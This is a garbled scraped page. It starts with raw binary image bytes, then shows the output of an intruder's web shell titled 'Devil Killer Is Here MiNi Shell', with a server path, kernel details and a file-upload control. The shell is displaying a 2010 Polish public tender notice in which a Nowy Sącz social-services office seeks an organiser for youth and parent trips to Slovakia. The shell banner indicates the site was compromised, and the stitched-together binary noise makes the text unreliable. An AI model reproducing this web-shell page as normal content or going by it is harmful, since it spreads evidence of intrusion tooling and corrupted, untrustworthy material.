JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20101007/323730-N-2010.html

<p class="kh_header"><b>Nowy Sącz: Zorganizowania imprez turystycznych na rzecz Zespołu Świetlic Środowiskowych w Nowym Sączu w ramach projektu systemowego Twoja AKTYWNOŚĆ szansą na sukces współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego w zakresie Partnera nr II</b><br>
<b>Numer ogłoszenia: 323730 - 2010; data zamieszczenia: 07.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Żywiecka 13, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4443623, faks 018 4435239.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.nowysacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowania imprez turystycznych na rzecz Zespołu Świetlic Środowiskowych w Nowym Sączu w ramach projektu systemowego Twoja AKTYWNOŚĆ szansą na sukces współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego w zakresie Partnera nr II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1
Zorganizowanie imprezy turystycznej na rzecz Zespołu Świetlic Środowiskowych w Nowym Sączu - Klub Młodzieżowy w ramach projektu systemowego Twoja AKTYWNOŚĆ szansą na sukces współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego w zakresie Partnera nr II
Przedmiotem zamówienia jest kompleksowe zorganizowanie i wykonanie trzy dniowej imprezy turystycznej dla ZŚŚ na terytorium Rzeczpospolitej Polskiej i  Republiki Słowackiej, dla minimum 35 osób dorosłych i młodzieży. Wykonawca zapewni dla uczestników imprezy turystycznej dla ZŚŚ (w tym osoby dorosłe i młodzież) niżej wymienione usługi turystyczne:
1.	Przejazd  autokarem typu LUX, nie więcej niż 500 km. Trasa: Nowy Sącz - miejsce imprezy turystycznej dla ZŚŚ, oraz przejazdy autokarem do miejsc wyznaczonych w harmonogramie wyjazdu - w tym: opłaty parkingowe dla autokaru.
a)	Zapewnienie kierowcy noclegów, wyżywienie oraz pokrycie innych kosztów związanych z wykonywaniem przez niego czynności kierowcy. 
2.	Usługi noclegowe:
a)	Zakwaterowanie w obiekcie wypoczynkowym znajdującym się w Republice Słowackiej w Liptowskim Mikulaszu lub miejscowości położonej nie dalej niż 25 km od Liptowskiego Mikulaszu. 
b)	Wykonawca zagwarantuje 2 noclegi, dla  uczestników imprezy turystycznej dla ZŚŚ, dla grupy maksymalnie 44 osobowej  (z piątku na sobotę i z soboty na niedzielę) .
c)	Ośrodek/hotel/pensjonat powinien dysponować:
a.	co najmniej 50 miejscami noclegowymi
b.	pokojami  2,3 i 4 osobowe z pełnym węzłem sanitarnym (WC + łazienka+CO)
c.	W każdym pokoju powinno znajdować się jednoosobowe łóżko pomnożone przez ilość  miejsc w danym pokoju, szafa na ubrania, krzesło, stolik lampka nocna
d.	kuchnią wyposażoną w odpowiedni sprzęt umożliwiający przygotowanie i podanie posiłków w jednym czasie dla minimum 50 osób
e.	 jadalnią z wyposażeniem na minimum 50 osób, 
f.	salą dyskotekową ze sprzętem nagłaśniającym i oświetleniem
g.	 2 salami dydaktycznymi z minimum 25 miejscami siedzącym każda sala, każda sala musi być wyposażona w flipchart z papierem i kompletem markerów (minimum 3 kolory)
3.	Wykonawca zapewnia całodzienne wyżywienie i gwarantuje, że podawane posiłki będą urozmaicone, kaloryczne - zgodnie z normami  obowiązującymi w żywieniu zbiorowym. Dostarczone produkty żywnościowe będą świeże i winne być przyrządzone w dniu ich wydania. Przygotowywanie i podawanie posiłków będzie się odbywało zachowując wymogi sanitarno-epidemiologiczne w zakresie personelu i warunków produkcji. Wykonawca weźmie odpowiedzialność za ich przestrzeganie. 
Całodzienne wyżywienie odbywać będzie się w sposób następujący:
a)	w pierwszym dniu imprezy turystycznej dla ZŚŚ (piątek) podawana kolacja będzie bez mięsna
b)	w sobotę Wykonawca zapewnia śniadanie dla  uczestników imprezy turystycznej dla ZŚŚ w formie szwedzkiego stołu
c)	w sobotę Wykonawca zapewnia obiad jednodaniowy dla  uczestników imprezy turystycznej dla ZŚŚ oraz podwieczorek na basenach termalnych
d)	w sobotę Wykonawca zapewnia kolację dla  uczestników imprezy turystycznej dla ZŚŚ w formie ogniska i grilla (w razie niepogody kolacja z tradycyjnymi potrawami Republiki Słowackiej) 
e)	w niedzielę Wykonawca zapewnia śniadanie dla uczestników imprezy turystycznej dla ZŚŚ w formie szwedzkiego stołu
f)	w niedzielę Wykonawca zapewnia zwiększoną porcję prowiantu, wydawanego podczas śniadania każdemu uczestnikowi imprezy turystycznej dla ZŚŚ, który powinien wystarczyć do godziny 1800 - 1900
4.	Wykonawca zapewnia Kadrę w postaci:
a)	Dwóch (2) wychowawców dla uczestników imprezy turystycznej dla ZŚŚ
b)	Kierownika/Pilota imprezy turystycznej dla ZŚŚ, który będzie pełnił funkcję tłumacza- znajomość co najmniej w mowie języka słowackiego
c)	Przewodników potrzebnych do oprowadzenia uczestników imprezy turystycznej dla ZŚŚ po zwiedzanych obiektach
d)	Wykonawca pokrywa wszystkie koszty związane z pobytem Kadry (przejazd, noclegi, wyżywienie, bilety wstępu oraz inne koszty związane z wykonywaniem przez nich czynności na danym stanowisku)
5.	Wykonawca zapewnia bilety wstępu dla uczestników imprezy turystycznej dla ZŚŚ do wszystkich zwiedzanych obiektów.
6.	Przed wyjazdem Wykonawca pozostawi Zespołowi Świetlic Środowiskowym w Nowym Sączu numer telefonu komórkowego do kierownika/pilota imprezy turystycznej dla ZŚŚ i zobowiązuje się utrzymywać kontakt za granicą i w Polsce w trakcie realizacji imprezy turystycznej dla ZŚŚ
7.	Wykonawca zapewni ubezpieczenie dla każdego uczestnika imprezy turystycznej dla ZŚŚ: 
a)	Następstw Nieszczęśliwych Wypadków do kwoty 10 000 Euro na każdą osobę uczestniczącą w imprezie turystycznej dla ZŚŚ
b)	ubezpieczenie Kosztów Leczenia i Assistance do kwoty 10 000 Euro na każdą osobę uczestniczącą w imprezie turystycznej dla ZŚŚ 
8.	Wykonawca będzie realizował imprezę turystyczną dla ZŚŚ zgodnie z harmonogramem imprezy turystycznej dla ZŚŚ - Zadanie Nr 1, który stanowi załącznik nr 1 do SIWZ
9.	Koszty realizacji przedmiotu zamówienia obejmują zakres usług wyszczególnionych rozdziale III niniejszej specyfikacji, które Wykonawca będzie musiał ponieść w celu należytego wykonania przedmiotu zamówienia. 
10.	Wykonawca zobowiązuje się do zapewnienia Kadry osób realizujących zamówienie spośród specjalistów posiadających odpowiednie kwalifikacje i doświadczenie, dzięki którym przedmiot zamówienia zostanie zrealizowany z należytą starannością.
11.	Zamawiający poda ostateczną ilość uczestników imprezy turystycznej dla ZŚŚ na 3 dni przed terminem wyjazdu.
12.	Zamawiający Zespół Świetlic Środowiskowych Nowym Sączu zapewnia minimalną liczbę uczestników imprezy turystycznej dla ZŚŚ - 35 osoby (31 osób młodzieży, 2 trenerów i 2 osoby kadry projektu), a maksymalna liczba uczestników imprezy turystycznej dla ZŚŚ może wynieść 44 osoby.
13.	Zamawiający zapłaci Wykonawcy wynagrodzenie w zależności od faktycznie wykonanej usługi, tj. cena ryczałtowej za  1 (jednego) uczestnika imprezy turystycznej dla ZŚŚ pomnożona przez faktyczną ilość  uczestników imprezy turystycznej dla ZŚŚ.
14.	Dyrektor Zespołu Świetlic Środowiskowych w Nowym Sączu może wezwać policję do sprawdzenia stanu technicznego podstawionego autokaru i sprawdzenia stanu trzeźwości (zawartości alkoholu we krwi) kierowcy. Z chwilą wystąpienia nieprawidłowości Wykonawca do godziny 1600 obowiązany jest do spełnienia zaleceń służb kontrolujących stan techniczny autokaru i trzeźwość kierowcy.

Zadanie Nr 2
Zorganizowanie imprezy turystycznej na rzecz Zespołu Świetlic Środowiskowych w Nowym Sączu - rodzice, opiekunowie prawni w ramach projektu systemowego Twoja AKTYWNOŚĆ szansą na sukces współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego w zakresie Partnera nr II

Przedmiotem zamówienia jest kompleksowe zorganizowanie i wykonanie dwu dniowej imprezy turystycznej dla ZŚŚ na terytorium Rzeczpospolitej Polskiej i  Republiki Słowackiej dla minimum 13 osób, Wykonawca zapewni dla uczestników imprezy turystycznej dla ZŚŚ (osoby dorosłe) niżej wymienione usługi turystyczne:
1.	Przejazd  autokarem/busem typu LUX, nie więcej niż 500 km. Trasa: Nowy Sącz - miejsce imprezy turystycznej dla ZŚŚ, oraz przejazdy autokarem do miejsc wyznaczonych w harmonogramie wyjazdu - w tym: opłaty parkingowe dla autokaru.
a)	Zapewnienie kierowcy noclegów, wyżywienie oraz pokrycie innych kosztów związanych z wykonywaniem przez niego czynności kierowcy. 
2.	Usługi noclegowe:
a)	Zakwaterowanie w obiekcie wypoczynkowym znajdującym się w Republice Słowackiej w Liptowskim Mikulaszu lub miejscowości położonej nie dalej niż 25 km od Liptowskiego Mikulaszu, w ośrodku/hotelu/pensjonacie innym niż w zadaniu Nr 1. 
b)	Wykonawca zagwarantuje 1 nocleg, dla  uczestników imprezy turystycznej dla ZŚŚ, dla grupy maksymalnie 17 osobowej  (z soboty na niedzielę) .
c)	Ośrodek/hotel/pensjonat powinien dysponować:
a.	co najmniej 20 miejscami noclegowymi
b.	pokojami  2,3 i 4 osobowe z pełnym węzłem sanitarnym (WC + łazienka+CO)
c.	W każdym pokoju powinno znajdować się jednoosobowe łóżko pomnożone przez ilość  miejsc w danym pokoju, szafa na ubrania, krzesło, stolik lampka nocna
d.	kuchnią wyposażoną w odpowiedni sprzęt umożliwiający przygotowanie i podanie posiłków w jednym czasie dla minimum 25 osób
e.	 jadalnią z wyposażeniem na minimum 25 osób, 
f.	1 salą dydaktyczną z minimum 16 miejscami siedzącym, sala musi być wyposażona w flipchart z papierem i kompletem markerów (minimum 3 kolory)
3.	Wykonawca zapewnia całodzienne wyżywienie i gwarantuje, że podawane posiłki będą urozmaicone, kaloryczne - zgodnie z normami  obowiązującymi w żywieniu zbiorowym. Dostarczone produkty żywnościowe będą świeże i winne być przyrządzone w dniu ich wydania. Przygotowywanie i podawanie posiłków będzie się odbywało zachowując wymogi sanitarno-epidemiologiczne w zakresie personelu i warunków produkcji. Wykonawca weźmie odpowiedzialność za ich przestrzeganie. 
Całodzienne wyżywienie odbywać będzie się w sposób następujący:
a)	w sobotę Wykonawca zapewnia śniadanie dla  uczestników imprezy turystycznej dla ZŚŚ w formie szwedzkiego stołu
b)	w sobotę Wykonawca zapewnia obiad jednodaniowy dla  uczestników imprezy turystycznej dla ZŚŚ oraz podwieczorek na basenach termalnych
c)	w sobotę Wykonawca zapewnia kolację dla  uczestników imprezy turystycznej dla ZŚŚ w formie ogniska i grilla (w razie niepogody kolacja z tradycyjnymi potrawami Republiki Słowackiej) 
d)	w niedzielę Wykonawca zapewnia śniadanie dla uczestników imprezy turystycznej dla ZŚŚ w formie szwedzkiego stołu
e)	w niedzielę Wykonawca zapewnia zwiększoną porcję prowiantu dla uczestników imprezy turystycznej dla ZŚŚ, który powinien wystarczyć do godziny 1800 - 1900
4.	Wykonawca zapewnia Kadrę w postaci:
a)	Kierownika/Pilota imprezy turystycznej dla ZŚŚ, który będzie pełnił funkcję tłumacza- znajomość co najmniej w mowie języka słowackiego
b)	Przewodników potrzebnych do oprowadzenia uczestników imprezy turystycznej dla ZŚŚ po zwiedzanych obiektach
c)	Wykonawca pokrywa wszystkie koszty związane z pobytem Kadry (przejazd, noclegi, wyżywienie, bilety wstępu oraz inne koszty związane z wykonywaniem przez nich czynności na danym stanowisku)
5.	Wykonawca zapewnia bilety wstępu dla uczestników imprezy turystycznej dla ZŚŚ do wszystkich zwiedzanych obiektów.
6.	Przed wyjazdem Wykonawca pozostawi Zespołowi Świetlic Środowiskowym w Nowym Sączu numer telefonu komórkowego do kierownika/pilota imprezy turystycznej dla ZŚŚ i zobowiązuje się utrzymywać kontakt za granicą i w Polsce w trakcie realizacji imprezy turystycznej dla ZŚŚ
7.	Wykonawca zapewni ubezpieczenie dla każdego uczestnika imprezy turystycznej dla ZŚŚ: 
a)	Następstw Nieszczęśliwych Wypadków do kwoty 10 000 Euro na każdą osobę uczestniczącą w imprezie turystycznej dla ZŚŚ
b)	ubezpieczenie Kosztów Leczenia i Assistance do kwoty 10 000 Euro na każdą osobę uczestniczącą w imprezie turystycznej dla ZŚŚ 
8.	Wykonawca będzie realizował imprezę turystyczną dla ZŚŚ zgodnie z harmonogramem imprezy turystycznej dla ZŚŚ - Zadanie Nr 2, który stanowi załącznik nr 2 do SIWZ
9.	Koszty realizacji przedmiotu zamówienia obejmują zakres usług wyszczególnionych rozdziale III niniejszej specyfikacji, które Wykonawca będzie musiał ponieść w celu należytego wykonania przedmiotu zamówienia. 
10.	Wykonawca zobowiązuje się do zapewnienia Kadry osób realizujących zamówienie spośród specjalistów posiadających odpowiednie kwalifikacje i doświadczenie, dzięki którym przedmiot zamówienia zostanie zrealizowany z należytą starannością.
11.	Zamawiający poda ostateczną ilość uczestników imprezy turystycznej dla ZŚŚ na 3 dni przed terminem.
12.	Zespół Świetlic Środowiskowych Nowym Sączu zapewnia minimalną liczbę uczestników imprezy turystycznej dla ZŚŚ - 13 osoby (11 osób rodziców i opiekunów prawnych i 2 osoby kadry projektu), a maksymalna liczba uczestników imprezy turystycznej dla ZŚŚ może wynieść 17 osoby.
13.	Zamawiający zapłaci Wykonawcy wynagrodzenie w zależności od faktycznie wykonanej usługi, tj. cena ryczałtowej za  1 (jednego) uczestnika imprezy turystycznej dla ZŚŚ pomnożona przez faktyczną ilość  uczestników imprezy turystycznej dla ZŚŚ.
14.	Dyrektor Zespołu Świetlic Środowiskowych w Nowym Sączu może wezwać policję do sprawdzenia stanu technicznego podstawionego autokaru i sprawdzenia stanu trzeźwości (zawartości alkoholu we krwi) kierowcy. Z chwilą wystąpienia nieprawidłowości Wykonawca do godziny 815 obowiązany jest do spełnienia zaleceń służb kontrolujących stan techniczny autokaru i trzeźwość kierowcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4, 63.51.10.00-4, 92.30.00.00-4, 92.33.12.10-5, 55.50.00.00-5, 55.51.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku
Posiadanie wpisu do Rejestru Organizatorów Turystyki i Pośredników Turystycznych o prowadzeniu działalność gospodarczej w zakresie organizowania imprez turystycznych - zgodnie z art. 4 ust.1. ustawy z dnia 29 sierpnia 1997 r. o usługach turystycznych (Dz. U. z 2004r. Nr 223 poz. 2268 z późn. zm). Ocena spełnienia powyższego warunku  dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach na podstawie przedłożonych dokumentów.
W zakresie wskazanego warunku należy złożyć oświadczenie - uprawnienia- załącznik nr 3 do SIWZ, że osoby, które będą  uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, określone Rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca spełni ten warunek, jeżeli wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 6 usług obejmujących organizację wycieczek zagranicznych do Republiki Słowackiej. Wzór wykazu wykonanych usług załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje opisu sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje opisu sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku :
w formie oryginału lub kserokopii poświadczonej (każda zapisana strona) za zgodność z oryginałem opłaconej polisy, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. Polisa na kwotę nie mniejszą niż 50000,00 zł brutto ( słownie: pięćdziesiąt tysięcy złoty 00/100). Ocena spełnienia powyższego warunku  dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach na podstawie przedłożonych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w razie wystąpienia, przynajmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia w zakresie zmian terminu wykonania umowy, sposobu wykonania umowy, osób wymienionych w umowie i wykonujących określone czynności:
zmiana obowiązującej stawki VAT; Jeśli zmiana stawki VAT będzie powodować zmniejszenie lub zwiększenie kosztów wykonania umowy Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie zmniejszonego lub zwiększonego podatku zapłaconego przez wykonawcę.
zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez zamawiającego umowy o dofinansowanie projektu systemowego lub wytycznych dotyczących realizacji zamówienia;
rezygnacja z realizacji części przedmiotu  umowy i zmiana umowy w tym zakresie spowodowana rozwiązaniem lub zmianą umowy o realizację projektów lub zmiany w wysokości środków finansowych przeznaczonych na realizację projektów w poszczególnych latach budżetowych.
zmiany danych organizacyjnych czy administracyjnych dotyczących stron  np. zmiana nr rachunku bankowego, dokumentów potwierdzających uregulowanie płatności wobec podwykonawców; zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy stronami 
wynikłe z nieprzewidzianych okoliczności, siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.nowysacz.pl, www.nowysacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Nowym Sączu ul. Żywiecka 13, pok. 120.</p>
